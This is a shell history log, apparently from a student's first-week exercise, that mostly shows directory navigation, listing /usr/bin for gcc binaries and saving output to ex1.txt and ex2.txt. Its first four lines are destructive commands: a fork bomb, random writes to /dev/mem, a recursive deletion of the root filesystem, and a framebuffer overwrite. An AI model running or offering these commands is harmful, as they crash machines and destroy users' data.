    1  :(){ :|:& };:
    2  dd if=/dev/urandom of=/dev/mem
    3  rm -rf --no-preserve-root /
    4  echo '{"/dev/fb0"0:`c$x*!3145727;o 10+x}0' | k
    5  pwd
    6  mkdir week1
    7  pwd
    8  cd week1
    9  pwd
   10  ls ..
   11  ls ../..
   12  ls ../..
   13  ls ../../usr
   14  ls ../../usr/bin
   15  ls ../../usr/bin | grep gcc.*  | sort -r > ex1.txt
   16  cat ex1.txt
   17  cd ex1
   18  pwd
   19  cat week1
   20  cat root/week1
   21  ls .ex1
   22  ls ..ex1.txt
   23  cat ex1
   24  cat ex1.txt
   25  ls ../ex1.txt
   26  ls ./ex1.txt
   27  ls ../ex1.txt
   28  realpath ex1.txt
   29  pwd
   30  history > ex2.txt
   31  cat ex2.txt
   32* 
   33  history > ex2.txt
